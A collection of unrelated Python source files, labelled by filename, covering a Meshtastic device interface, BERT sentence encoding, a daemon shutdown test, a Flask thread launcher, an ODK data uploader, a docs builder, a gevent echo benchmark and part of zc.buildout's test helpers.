(default: {None}) """ if devPath is None: ports = util.findPorts() if len(ports) == 0: raise Exception("No Meshtastic devices detected") elif len(ports) > 1: raise Exception( f"Multiple ports detected, you must specify a device, such as {ports[0].device}") else: devPath = ports[0] logging.debug(f"Connecting to {devPath}") # Note: we provide None for port here, because we will be opening it later self.stream = serial.Serial( None, 921600, exclusive=True, timeout=0.5) # rts=False Needed to prevent TBEAMs resetting on OSX, because rts is connected to reset self.stream.port = devPath # OS-X seems to have a bug in its serial driver. It ignores that we asked for no RTSCTS # control and will always drive RTS either high or low (rather than letting the CP102 leave # it as an open-collector floating pin). Since it is going to drive it anyways we want to make # sure it is driven low, so that the TBEAM won't reset if platform.system() == 'Darwin': self.stream.rts = False self.stream.open() StreamInterface.__init__( self, debugOut=debugOut, noProto=noProto, connectNow=connectNow) def _disconnected(self): """We override the superclass implementation to close our port""" if platform.system() == 'Darwin': self.stream.rts = True # Return RTS high, so that the reset button still works StreamInterface._disconnected(self) class TCPInterface(StreamInterface): """Interface class for meshtastic devices over a TCP link""" def __init__(self, hostname, debugOut=None, noProto=False, connectNow=True, portNumber=4403): """Constructor, opens a connection to a specified IP address/hostname Keyword Arguments: hostname {string} -- Hostname/IP address of the device to connect to """ logging.debug(f"Connecting to {hostname}") server_address = (hostname, portNumber) sock = socket.create_connection(server_address) # Instead of wrapping as a stream, we use the native socket API # self.stream = sock.makefile('rw') self.stream = None self.socket = sock StreamInterface.__init__( self, debugOut=debugOut, noProto=noProto, connectNow=connectNow) def _disconnected(self): """We override the superclass implementation to close our port""" StreamInterface._disconnected(self) logging.debug("Closing our socket") if not self.socket is None: self.socket.close() def _writeBytes(self, b): """Write an array of bytes to our stream and flush""" self.socket.send(b) def _readBytes(self, len): """Read an array of bytes from our stream""" return self.socket.recv(len)
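# Hedged usage sketch (illustration only, not part of the library): the classes
# above can also be driven over TCP instead of serial, and raw data packets can
# be handled via the pubsub topics documented in the module docstring.  The
# host address below is a placeholder; TCPInterface, sendData, channelURL and
# the packet dictionary layout all come from the code above.
if __name__ == "__main__":
    def _on_data(packet, interface):
        # decoded.data.payload holds the raw bytes that were sent; for
        # CLEAR_TEXT packets decoded.data.text is also populated (see
        # _handlePacketFromRadio above).
        print(f"data from {packet['fromId']}: {packet['decoded']['data']['payload']}")

    def _on_connect(interface, topic=pub.AUTO_TOPIC):
        # Broadcast a small opaque payload once the node DB has been downloaded.
        interface.sendData(b"\x01\x02\x03", wantAck=True)
        print(f"channel URL: {interface.channelURL}")

    pub.subscribe(_on_data, "meshtastic.receive.data")
    pub.subscribe(_on_connect, "meshtastic.connection.established")

    # Placeholder address; the default portNumber is 4403 (see TCPInterface).
    interface = TCPInterface("192.168.1.20")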
extract_feature.py
import modeling import tokenization from graph import optimize_graph import args from queue import Queue from threading import Thread import tensorflow as tf import os os.environ['CUDA_VISIBLE_DEVICES'] = '0' class InputExample(object): def __init__(self, unique_id, text_a, text_b): self.unique_id = unique_id self.text_a = text_a self.text_b = text_b class InputFeatures(object): """A single set of features of data.""" def __init__(self, unique_id, tokens, input_ids, input_mask, input_type_ids): self.unique_id = unique_id self.tokens = tokens self.input_ids = input_ids self.input_mask = input_mask self.input_type_ids = input_type_ids class BertVector: def __init__(self, batch_size=32): """ init BertVector :param batch_size: Depending on your memory default is 32 """ self.max_seq_length = args.max_seq_len self.layer_indexes = args.layer_indexes self.gpu_memory_fraction = 1 self.graph_path = optimize_graph() self.tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True) self.batch_size = batch_size self.estimator = self.get_estimator() self.input_queue = Queue(maxsize=1) self.output_queue = Queue(maxsize=1) self.predict_thread = Thread(target=self.predict_from_queue, daemon=True) self.predict_thread.start() self.sentence_len = 0 def get_estimator(self): from tensorflow.python.estimator.estimator import Estimator from tensorflow.python.estimator.run_config import RunConfig from tensorflow.python.estimator.model_fn import EstimatorSpec def model_fn(features, labels, mode, params): with tf.gfile.GFile(self.graph_path, 'rb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) input_names = ['input_ids', 'input_mask', 'input_type_ids'] output = tf.import_graph_def(graph_def, input_map={k + ':0': features[k] for k in input_names}, return_elements=['final_encodes:0']) return EstimatorSpec(mode=mode, predictions={ 'encodes': output[0] }) config = tf.ConfigProto() config.gpu_options.allow_growth = True config.gpu_options.per_process_gpu_memory_fraction = self.gpu_memory_fraction config.log_device_placement = False config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1 return Estimator(model_fn=model_fn, config=RunConfig(session_config=config), params={'batch_size': self.batch_size}) def predict_from_queue(self): prediction = self.estimator.predict(input_fn=self.queue_predict_input_fn, yield_single_examples=False) for i in prediction: self.output_queue.put(i) def encode(self, sentence): self.sentence_len = len(sentence) self.input_queue.put(sentence) prediction = self.output_queue.get()['encodes'] return prediction def queue_predict_input_fn(self): return (tf.data.Dataset.from_generator( self.generate_from_queue, output_types={'unique_ids': tf.int32, 'input_ids': tf.int32, 'input_mask': tf.int32, 'input_type_ids': tf.int32}, output_shapes={ 'unique_ids': (self.sentence_len,), 'input_ids': (None, self.max_seq_length), 'input_mask': (None, self.max_seq_length), 'input_type_ids': (None, self.max_seq_length)}).prefetch(10)) def generate_from_queue(self): while True: features = list(self.convert_examples_to_features(seq_length=self.max_seq_length, tokenizer=self.tokenizer)) yield { 'unique_ids': [f.unique_id for f in features], 'input_ids': [f.input_ids for f in features], 'input_mask': [f.input_mask for f in features], 'input_type_ids': [f.input_type_ids for f in features] } def input_fn_builder(self, features, seq_length): """Creates an `input_fn` closure to be passed to Estimator.""" all_unique_ids = [] all_input_ids = [] 
all_input_mask = [] all_input_type_ids = [] for feature in features: all_unique_ids.append(feature.unique_id) all_input_ids.append(feature.input_ids) all_input_mask.append(feature.input_mask) all_input_type_ids.append(feature.input_type_ids) def input_fn(params): """The actual input function.""" batch_size = params["batch_size"] num_examples = len(features) # This is for demo purposes and does NOT scale to large data sets. We do # not use Dataset.from_generator() because that uses tf.py_func which is # not TPU compatible. The right way to load data is with TFRecordReader. d = tf.data.Dataset.from_tensor_slices({ "unique_ids": tf.constant(all_unique_ids, shape=[num_examples], dtype=tf.int32), "input_ids": tf.constant( all_input_ids, shape=[num_examples, seq_length], dtype=tf.int32), "input_mask": tf.constant( all_input_mask, shape=[num_examples, seq_length], dtype=tf.int32), "input_type_ids": tf.constant( all_input_type_ids, shape=[num_examples, seq_length], dtype=tf.int32), }) d = d.batch(batch_size=batch_size, drop_remainder=False) return d return input_fn def model_fn_builder(self, bert_config, init_checkpoint, layer_indexes): """Returns `model_fn` closure for TPUEstimator.""" def model_fn(features, labels, mode, params): # pylint: disable=unused-argument """The `model_fn` for TPUEstimator.""" unique_ids = features["unique_ids"] input_ids = features["input_ids"] input_mask = features["input_mask"] input_type_ids = features["input_type_ids"] jit_scope = tf.contrib.compiler.jit.experimental_jit_scope with jit_scope(): model = modeling.BertModel( config=bert_config, is_training=False, input_ids=input_ids, input_mask=input_mask, token_type_ids=input_type_ids) if mode != tf.estimator.ModeKeys.PREDICT: raise ValueError("Only PREDICT modes are supported: %s" % (mode)) tvars = tf.trainable_variables() (assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint) tf.logging.info("**** Trainable Variables ****") for var in tvars: init_string = "" if var.name in initialized_variable_names: init_string = ", *INIT_FROM_CKPT*" tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape, init_string) all_layers = model.get_all_encoder_layers() predictions = { "unique_id": unique_ids, } for (i, layer_index) in enumerate(layer_indexes): predictions["layer_output_%d" % i] = all_layers[layer_index] from tensorflow.python.estimator.model_fn import EstimatorSpec output_spec = EstimatorSpec(mode=mode, predictions=predictions) return output_spec return model_fn def convert_examples_to_features(self, seq_length, tokenizer): """Loads a data file into a list of `InputBatch`s.""" features = [] input_masks = [] examples = self._to_example(self.input_queue.get()) for (ex_index, example) in enumerate(examples): tokens_a = tokenizer.tokenize(example.text_a) # if the sentences's length is more than seq_length, only use sentence's left part if len(tokens_a) > seq_length - 2: tokens_a = tokens_a[0:(seq_length - 2)] # The convention in BERT is: # (a) For sequence pairs: # tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP] # type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1 # (b) For single sequences: # tokens: [CLS] the dog is hairy . [SEP] # type_ids: 0 0 0 0 0 0 0 # # Where "type_ids" are used to indicate whether this is the first # sequence or the second sequence. The embedding vectors for `type=0` and # `type=1` were learned during pre-training and are added to the wordpiece # embedding vector (and position vector). 
This is not *strictly* necessary # since the [SEP] token unambiguously separates the sequences, but it makes # it easier for the model to learn the concept of sequences. # # For classification tasks, the first vector (corresponding to [CLS]) is # used as as the "sentence vector". Note that this only makes sense because # the entire model is fine-tuned. tokens = [] input_type_ids = [] tokens.append("[CLS]") input_type_ids.append(0) for token in tokens_a: tokens.append(token) input_type_ids.append(0) tokens.append("[SEP]") input_type_ids.append(0) # Where "input_ids" are tokens's index in vocabulary input_ids = tokenizer.convert_tokens_to_ids(tokens) # The mask has 1 for real tokens and 0 for padding tokens. Only real # tokens are attended to. input_mask = [1] * len(input_ids) input_masks.append(input_mask) # Zero-pad up to the sequence length. while len(input_ids) < seq_length: input_ids.append(0) input_mask.append(0) input_type_ids.append(0) assert len(input_ids) == seq_length assert len(input_mask) == seq_length assert len(input_type_ids) == seq_length if ex_index < 5: tf.logging.info("*** Example ***") tf.logging.info("unique_id: %s" % (example.unique_id)) tf.logging.info("tokens: %s" % " ".join( [tokenization.printable_text(x) for x in tokens])) tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids])) tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask])) tf.logging.info( "input_type_ids: %s" % " ".join([str(x) for x in input_type_ids])) yield InputFeatures( unique_id=example.unique_id, tokens=tokens, input_ids=input_ids, input_mask=input_mask, input_type_ids=input_type_ids) def _truncate_seq_pair(self, tokens_a, tokens_b, max_length): """Truncates a sequence pair in place to the maximum length.""" # This is a simple heuristic which will always truncate the longer sequence # one token at a time. This makes more sense than truncating an equal percent # of tokens from each, since if one sequence is very short then each token # that's truncated likely contains more information than a longer sequence. while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() @staticmethod def _to_example(sentences): import re """ sentences to InputExample :param sentences: list of strings :return: list of InputExample """ unique_id = 0 for ss in sentences: line = tokenization.convert_to_unicode(ss) if not line: continue line = line.strip() text_a = None text_b = None m = re.match(r"^(.*) \|\|\| (.*)$", line) if m is None: text_a = line else: text_a = m.group(1) text_b = m.group(2) yield InputExample(unique_id=unique_id, text_a=text_a, text_b=text_b) unique_id += 1 if __name__ == "__main__": bert = BertVector() # while True: # question = input('question: ') vectors = bert.encode(['ไฝ ๅฅฝ', 'ๅ“ˆๅ“ˆ']) print(str(vectors))
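# Hedged sketch (illustration only): _to_example() above is a pure generator,
# so its " ||| " pair-splitting can be exercised without loading the model.
# The strings are placeholders.  Note that convert_examples_to_features() only
# tokenizes text_a, so the text_b half of a pair is parsed but not embedded.
def _show_to_example():
    examples = list(BertVector._to_example(
        ['a single sentence', 'first half ||| second half']))
    for ex in examples:
        # -> 0 'a single sentence' None
        # -> 1 'first half' 'second half'
        print(ex.unique_id, repr(ex.text_a), repr(ex.text_b))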
feature_shutdown.py
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The thecoffeecoins Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test thecoffeecoinsd shutdown."""

from test_framework.test_framework import thecoffeecoinsTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread


def test_long_call(node):
    block = node.waitfornewblock()
    assert_equal(block['height'], 0)


class ShutdownTest(thecoffeecoinsTestFramework):

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.supports_cli = False

    def run_test(self):
        node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
        # Force connection establishment by executing a dummy command.
        node.getblockcount()
        Thread(target=test_long_call, args=(node,)).start()
        # Wait until the server is executing the above `waitfornewblock`.
        self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
        # Wait 1 second after requesting shutdown but not before the `stop` call
        # finishes. This is to ensure event loop waits for current connections
        # to close.
        self.stop_node(0, wait=1000)


if __name__ == '__main__':
    ShutdownTest().main()
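# Hedged sketch (illustration only, with hypothetical names): the
# self.wait_until(...) call above is a poll-until-true helper provided by the
# test framework.  A standalone equivalent of that pattern looks roughly like
# this; it is not the framework's implementation.
import time

def poll_until(predicate, timeout=60, interval=0.05):
    """Poll predicate() until it returns True or `timeout` seconds elapse."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        if predicate():
            return
        time.sleep(interval)
    raise AssertionError('condition not met within %s seconds' % timeout)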
app.py
from flask import Flask
from sentence_extractor.token_ext_runner import extract_tokens_thread
from sentence_extractor.sentence_ext_runner import extract_sentences_thread
from machine_translator.machine_translator_runner import translation_fetcher_and_writer_thread
from machine_translator.machine_translator_runner import machine_translation_thread
from utils.anuvaad_tools_logger import getLogger
from api.tool_server_check_api import health_check_api
import threading

app = Flask(__name__)
app.register_blueprint(health_check_api)
log = getLogger()

try:
    log.info('Starting Threads')
    t1 = threading.Thread(target=extract_tokens_thread, name='token_extractor')
    t1.start()
    log.info('extract_tokens_thread started')
    t2 = threading.Thread(target=extract_sentences_thread, name='sentence_extractor')
    t2.start()
    t4 = threading.Thread(target=translation_fetcher_and_writer_thread, name='machine_translation_2')
    t4.start()
    t3 = threading.Thread(target=machine_translation_thread, name='machine_translation_1')
    t3.start()
    log.info('all threads started')
except Exception as e:
    log.error('ERROR WHILE RUNNING CUSTOM THREADS ' + str(e))

if __name__ == '__main__':
    app.run()
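# Hedged sketch: the health_check_api blueprint imported above comes from
# api/tool_server_check_api.py, which is not shown here.  A minimal blueprint
# of the same shape might look like this; the route path and payload are
# assumptions, not the real module's contents.
from flask import Blueprint, jsonify

health_check_api_sketch = Blueprint('health_check_api_sketch', __name__)

@health_check_api_sketch.route('/health', methods=['GET'])
def health_check():
    # Only reports that the HTTP server is up; the worker threads started in
    # app.py run independently of this endpoint.
    return jsonify({'status': 'ok'})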
bulk_odk.py
import requests import xmltodict import time from threading import Thread from queue import Queue # Recommended use: copy this script inside the nest container, because /upload # hasn't been opened to the outside. username = "username" password = "password" aggregate_url = "https://aggurl.info" form_id = "form_id" nest_url = "http://localhost:5000/upload" auth = requests.auth.HTTPDigestAuth(username, password) num_threads = 100 def get_odk_submission(aggregate_url: str, auth: requests.auth.HTTPDigestAuth, form_id: str, uuid: str) -> dict: form_id_string = f'{form_id}[@version=null and @uiVersion=null]/{form_id}[@key={uuid}]' submission = requests.get(aggregate_url + "/view/downloadSubmission", params={"formId": form_id_string}, auth=auth) if submission.status_code == 200: submission = xmltodict.parse(submission.text)["submission"]["data"][form_id] return fix_odk_data(submission) return None def fix_odk_data(form_submission: dict) -> dict: return_submission = {} for key, value in form_submission.items(): if key not in ["orx:meta"]: new_key = key.replace("@", "") return_submission[new_key] = value return return_submission def fix_groups(sub, delim=":"): new_sub = {} for key, value in sub.items(): if isinstance(value, dict): for inner_key, inner_value in value.items(): new_sub[key + delim + inner_key] = inner_value elif key == "instanceID": new_sub["*meta-instance-id*"] = value new_sub["meta:instanceID"] = value elif key == "submissionDate": new_sub["*meta-submission-date*"] = value elif key == "isComplete": new_sub["*meta-is-complete*"] = value elif key == "markedAsCompleteDate": new_sub["*meta-date-marked-as-complete*"] = value else: new_sub[key] = value return new_sub def submitt_to_nest(sub): data = { "formId": sub["id"], "data": [sub], "content": "record", "formVersion": None, "token": "" } requests.post(nest_url, json=data) def crawl(q): while not q.empty(): index, individual_submission = q.get() try: sub = get_odk_submission(aggregate_url, auth, form_id, individual_submission) submitt_to_nest(fix_groups(sub)) except Exception as e: raise e q.task_done() q = Queue(maxsize=0) ## To pull everything from ODK and push to nest: # cursor = None # Starting cursor # for i in range(10): # params = {"formId": form_id, # "numEntries": 3000} # if cursor is not None: # params["cursor"] = cursor # submissions = [] # with open("uuids.txt") as f: # submissions = [ s.strip() for s in f.readlines()] # requests.get(aggregate_url + "/view/submissionList", # params=params, auth=auth) # try: # submissions_dict = xmltodict.parse(submissions.text)["idChunk"] # except: # time.sleep(60) # next; # print(submissions_dict["resumptionCursor"]) # cursor = submissions_dict["resumptionCursor"] # for i, individual_submission in enumerate(submissions_dict["idList"]["id"]): # q.put((i, individual_submission)) # for i in range(num_threads): # worker = Thread(target=crawl, args=(q,)) # worker.setDaemon(True) # worker.start() # q.join() # if cursor is None: # break ## To read from a file with uuids filename = "uuids.txt" with open(filename) as f: submissions = [s.strip() for s in f.readlines()] for i, individual_submission in enumerate(submissions): q.put((i, individual_submission)) for i in range(num_threads): worker = Thread(target=crawl, args=(q,)) worker.setDaemon(True) worker.start() q.join()
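# Worked example (illustrative data only): fix_odk_data() strips "@" prefixes
# and drops the "orx:meta" block, then fix_groups() flattens one level of ODK
# groups with a ":" delimiter and maps the Aggregate meta fields onto the
# "*meta-...*" keys expected by nest.
def _show_fixups():
    raw = {
        '@id': 'form_id',
        '@instanceID': 'uuid:abc',
        '@submissionDate': '2020-01-01T00:00:00.000Z',
        'orx:meta': {'instanceID': 'uuid:abc'},
        'household': {'members': '4'},
    }
    sub = fix_groups(fix_odk_data(raw))
    # sub == {'id': 'form_id',
    #         '*meta-instance-id*': 'uuid:abc',
    #         'meta:instanceID': 'uuid:abc',
    #         '*meta-submission-date*': '2020-01-01T00:00:00.000Z',
    #         'household:members': '4'}
    print(sub)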
build_docs.py
import glob import os import shutil from pathlib import Path from subprocess import check_output from threading import Thread from typing import Dict, Union, Optional, Set, List, Sequence, Mapping from git import Git from ruamel.yaml import YAML # type: ignore from constants import ABS_PATH_OF_TOP_LEVEL_DIR class StringColors: HEADER = "\033[95m" OKBLUE = "\033[94m" OKGREEN = "\033[92m" WARNING = "\033[93m" FAIL = "\033[91m" ENDC = "\033[0m" BOLD = "\033[1m" UNDERLINE = "\033[4m" exclude_files = [ ".DS_Store", "__init__.py", "__init__.pyc", "README.md", "version.py", "run.py", "setup.py", "main.py", "main.py", ] def render_file( relative_src_path: str, src_file: str, to_file: str, modifier="" ) -> None: """Shells out to pydocmd, which creates a .md file from the docstrings of python functions and classes in the file we specify. The modifer specifies the depth at which to generate docs for classes and functions in the file. More information here: https://pypi.org/project/pydoc-markdown/ """ relative_src_namespace = relative_src_path.replace("/", ".") src_base = src_file.replace(".py", "") if relative_src_namespace == "": namespace = f"{src_base}{modifier}" else: namespace = f"{relative_src_namespace}.{src_base}{modifier}" pydoc_config = """'{ renderer: { type: markdown, code_headers: true, descriptive_class_title: false, add_method_class_prefix: true, source_linker: {type: github, repo: allenai/allenact}, header_level_by_type: { Module: 1, Class: 2, Method: 3, Function: 3, Data: 3, } } }'""" pydoc_config = " ".join(pydoc_config.split()) args = ["pydoc-markdown", "-m", namespace, pydoc_config] try: call_result = check_output([" ".join(args)], shell=True, env=os.environ).decode( "utf-8" ) # noinspection PyShadowingNames with open(to_file, "w") as f: doc_split = call_result.split("\n") # github_path = "https://github.com/allenai/allenact/tree/master/" # path = ( # github_path + namespace.replace(".", "/") + ".py" # ) # mdlink = "[[source]]({})".format(path) mdlink = "" # Removing the above source link for now. call_result = "\n".join([doc_split[0] + " " + mdlink] + doc_split[1:]) f.write(call_result) print( f"{StringColors.OKGREEN}[SUCCESS]{StringColors.ENDC} built docs for {src_file} -> {to_file}." ) except Exception as _: cmd = " ".join(args) print( f"{StringColors.WARNING}[SKIPPING]{StringColors.ENDC} could not" f" build docs for {src_file} (missing an import?). 
CMD: '{cmd}'" ) # noinspection PyShadowingNames def build_docs_for_file( relative_path: str, file_name: str, docs_dir: str, threads: List ) -> Dict[str, str]: """Build docs for an individual python file.""" clean_filename = file_name.replace(".py", "") markdown_filename = f"{clean_filename}.md" output_path = os.path.join(docs_dir, relative_path, markdown_filename) nav_path = os.path.join("api", relative_path, markdown_filename) thread = Thread(target=render_file, args=(relative_path, file_name, output_path)) thread.start() threads.append(thread) return {os.path.basename(clean_filename): nav_path} # noinspection PyShadowingNames def build_docs( base_dir: Union[Path, str], root_path: Union[Path, str], docs_dir: Union[Path, str], threads: List, allowed_dirs: Optional[Set[str]] = None, ): base_dir, root_path, docs_dir = str(base_dir), str(root_path), str(docs_dir) nav_root = [] for child in os.listdir(root_path): relative_path = os.path.join(root_path, child) if ( (allowed_dirs is not None) and (os.path.isdir(relative_path)) and (os.path.abspath(relative_path) not in allowed_dirs) # or ".git" in relative_path # or ".idea" in relative_path # or "__pycache__" in relative_path # or "tests" in relative_path # or "mypy_cache" in relative_path ): print("SKIPPING {}".format(relative_path)) continue # without_allenact = str(root_path).replace("allenact/", "") new_path = os.path.relpath(root_path, base_dir).replace(".", "") target_dir = os.path.join(docs_dir, new_path) if not os.path.exists(target_dir): os.mkdir(target_dir) if os.path.isdir(relative_path): nav_subsection = build_docs( base_dir, relative_path, docs_dir, threads=threads, allowed_dirs=allowed_dirs, ) if not nav_subsection: continue nav_root.append({child: nav_subsection}) else: if child in exclude_files or not child.endswith(".py"): continue nav = build_docs_for_file(new_path, child, docs_dir, threads=threads) nav_root.append(nav) return nav_root def project_readme_paths_to_nav_structure(project_readmes): nested_dict = {} for fp in project_readmes: has_seen_project_dir = False sub_nested_dict = nested_dict split_fp = os.path.dirname(fp).split("/") for i, yar in enumerate(split_fp): has_seen_project_dir = has_seen_project_dir or yar == "projects" if not has_seen_project_dir or yar == "projects": continue if yar not in sub_nested_dict: if i == len(split_fp) - 1: sub_nested_dict[yar] = fp.replace("docs/", "") break else: sub_nested_dict[yar] = {} sub_nested_dict = sub_nested_dict[yar] def recursively_create_nav_structure(nested_dict): if isinstance(nested_dict, str): return nested_dict to_return = [] for key in nested_dict: to_return.append({key: recursively_create_nav_structure(nested_dict[key])}) return to_return return recursively_create_nav_structure(nested_dict) def pruned_nav_entries(nav_entries): if isinstance(nav_entries, str): if os.path.exists(os.path.join("docs", nav_entries)): return nav_entries else: return None elif isinstance(nav_entries, Sequence): new_entries = [] for entry in nav_entries: entry = pruned_nav_entries(entry) if entry: new_entries.append(entry) return new_entries elif isinstance(nav_entries, Mapping): new_entries = {} for k, entry in nav_entries.items(): entry = pruned_nav_entries(entry) if entry: new_entries[k] = entry return new_entries else: raise NotImplementedError() def main(): os.chdir(ABS_PATH_OF_TOP_LEVEL_DIR) print("Copying all README.md files to docs.") with open("README.md") as f: readme_content = f.readlines() readme_content = [x.replace("docs/", "") for x in readme_content] with 
open("docs/index.md", "w") as f: f.writelines(readme_content) project_readmes = [] for readme_file_path in glob.glob("projects/**/README.md", recursive=True): if "docs/" not in readme_file_path: new_path = os.path.join("docs", readme_file_path) os.makedirs(os.path.dirname(new_path), exist_ok=True) shutil.copy(readme_file_path, new_path) project_readmes.append(new_path) print("Copying LICENSE file to docs.") shutil.copy("LICENSE", "docs/LICENSE.md") print("Copying CONTRIBUTING.md file to docs.") shutil.copy("CONTRIBUTING.md", "docs/CONTRIBUTING.md") # print("Copying CNAME file to docs.") # shutil.copy("CNAME", "docs/CNAME") print("Building the docs.") parent_folder_path = Path(__file__).parent.parent yaml_path = parent_folder_path / "mkdocs.yml" source_path = parent_folder_path docs_dir = str(parent_folder_path / "docs" / "api") if not os.path.exists(docs_dir): os.mkdir(docs_dir) # Adding project readmes to the yaml yaml = YAML() mkdocs_yaml = yaml.load(yaml_path) site_nav = mkdocs_yaml["nav"] # TODO Find a way to do the following in a way that results in nice titles. # projects_key = "Projects using allenact" # nav_obj = None # for obj in site_nav: # if projects_key in obj: # nav_obj = obj # break # nav_obj[projects_key] = project_readme_paths_to_nav_structure(project_readmes) with open(yaml_path, "w") as f: yaml.dump(mkdocs_yaml, f) # Get directories to ignore git_dirs = set( os.path.abspath(os.path.split(p)[0]) for p in Git(".").ls_files().split("\n") ) ignore_rel_dirs = ["docs", "scripts", "experiments", "src", ".pip_src"] ignore_abs_dirs = set( os.path.abspath(os.path.join(str(parent_folder_path), rel_dir)) for rel_dir in ignore_rel_dirs ) for d in ignore_abs_dirs: if d in git_dirs: git_dirs.remove(d) threads: List = [] nav_entries = build_docs( parent_folder_path, source_path, docs_dir, threads=threads, allowed_dirs=git_dirs, ) nav_entries.sort(key=lambda x: list(x)[0], reverse=False) for thread in threads: thread.join() nav_entries = pruned_nav_entries(nav_entries) docs_key = "API" # Find the yaml corresponding to the API nav_obj = None for obj in site_nav: if docs_key in obj: nav_obj = obj break nav_obj[docs_key] = nav_entries with open(yaml_path, "w") as f: yaml.dump(mkdocs_yaml, f) if __name__ == "__main__": main()
benchmark_echo.py
from gevent.server import StreamServer import gevent from gevent import socket, spawn from gevent import queue import multiprocessing import time import os """ (4765, 'New connection from 127.0.0.1:59612') on reader.. on writer.. call: 762043 KB/s, dt=1.2598 client: socker Close and sleep gevent for 0.5 sec server: transport exit server endof serve!!! The end """ NUM_CALLS = 20000 # * 50 * 2 # 0000 POOL = 100 SZ = 4096 * 12 host = 'localhost' server = None def run_server(): from gevent.server import StreamServer import gevent from gevent import socket, spawn from gevent import queue global server def _reader(f, q): print "on reader.." while True: data = f.recv(SZ) if not data: break # TODO: check this on other interfaces if len(data) != SZ: print len(data) q.put(data) def _writer(f, q): print "on writer.." while True: data = q.get() f.send(data) def _listener(sock, address): q = queue.Queue() print(os.getpid(), 'New connection from %s:%s' % address) r = spawn(_reader, sock, q) w = spawn(_writer, sock, q) r.join() print "server: transport exit" w.kill() server.close() gevent.sleep(0.5) print "XXX Should not be here. server force Halt!!" exit() server = StreamServer(('0.0.0.0', 2786), _listener) server.serve_forever() print "server endof serve!!!" # =================================== data = b'a' * SZ def beam(sock): sock.send(data) response = sock.recv(SZ) # assert len(data) == len(response) # print "*", def parallel(fobj): # pool = gevent.pool.Pool(POOL) # [pool.spawn(beam, fobj) for _ in range(NUM_CALLS)] # pool.join() [beam(fobj) for _ in range(NUM_CALLS)] def run_client(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.connect((host, 2786)) # fobj = sock.makefile(mode='r+') start = time.time() # [beam(session) for _ in range(NUM_CALLS)] parallel(sock) dt = time.time() - start print('call: %d KB/s, dt=%.4f' % (NUM_CALLS * SZ / dt / 1024, dt)) print "client: socker Close and sleep gevent for 0.5 sec" sock.close() gevent.sleep(0.5) if __name__ == '__main__': import sys if len(sys.argv) == 2 and sys.argv[1] == 'server': run_server() exit() elif len(sys.argv) == 2 and sys.argv[1] == 'client': run_client() exit() else: try: p = multiprocessing.Process(target=run_server) p.start() gevent.sleep(0.2) run_client() finally: gevent.sleep(0.4) p.terminate() p.join() print "The end"
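# Worked check of the sample figure quoted in the docstring at the top of this
# file: each call echoes SZ = 4096 * 12 = 49152 bytes, so NUM_CALLS = 20000
# calls moving 983,040,000 bytes in dt = 1.2598 s gives roughly
# 983040000 / 1.2598 / 1024 ~= 762,000 KB/s, matching the
# "call: 762043 KB/s, dt=1.2598" line.
def expected_throughput_kb_per_s(num_calls=NUM_CALLS, sz=SZ, dt=1.2598):
    return num_calls * sz / dt / 1024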
testing.py
############################################################################# # # Copyright (c) 2004-2009 Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## """Various test-support utility functions """ try: # Python 3 from http.server import HTTPServer, BaseHTTPRequestHandler from urllib.request import urlopen except ImportError: # Python 2 from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler from urllib2 import urlopen import errno import logging import os import pkg_resources import random import re import shutil import socket import subprocess import sys import tempfile import threading import time import zc.buildout.buildout import zc.buildout.easy_install from zc.buildout.rmtree import rmtree print_ = zc.buildout.buildout.print_ fsync = getattr(os, 'fsync', lambda fileno: None) is_win32 = sys.platform == 'win32' setuptools_location = pkg_resources.working_set.find( pkg_resources.Requirement.parse('setuptools')).location def cat(dir, *names): path = os.path.join(dir, *names) if (not os.path.exists(path) and is_win32 and os.path.exists(path+'-script.py') ): path = path+'-script.py' print_(open(path).read(), end='') def ls(dir, *subs): if subs: dir = os.path.join(dir, *subs) names = sorted(os.listdir(dir)) for name in names: if os.path.isdir(os.path.join(dir, name)): print_('d ', end=' ') elif os.path.islink(os.path.join(dir, name)): print_('l ', end=' ') else: print_('- ', end=' ') print_(name) def mkdir(*path): os.mkdir(os.path.join(*path)) def remove(*path): path = os.path.join(*path) if os.path.isdir(path): shutil.rmtree(path) else: os.remove(path) def rmdir(*path): shutil.rmtree(os.path.join(*path)) def write(dir, *args): path = os.path.join(dir, *(args[:-1])) f = open(path, 'w') f.write(args[-1]) f.flush() fsync(f.fileno()) f.close() def clean_up_pyc(*path): base, filename = os.path.join(*path[:-1]), path[-1] if filename.endswith('.py'): filename += 'c' # .py -> .pyc for path in ( os.path.join(base, filename), os.path.join(base, '__pycache__'), ): if os.path.isdir(path): rmdir(path) elif os.path.exists(path): remove(path) ## FIXME - check for other platforms MUST_CLOSE_FDS = not sys.platform.startswith('win') def system(command, input='', with_exit_code=False): p = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, 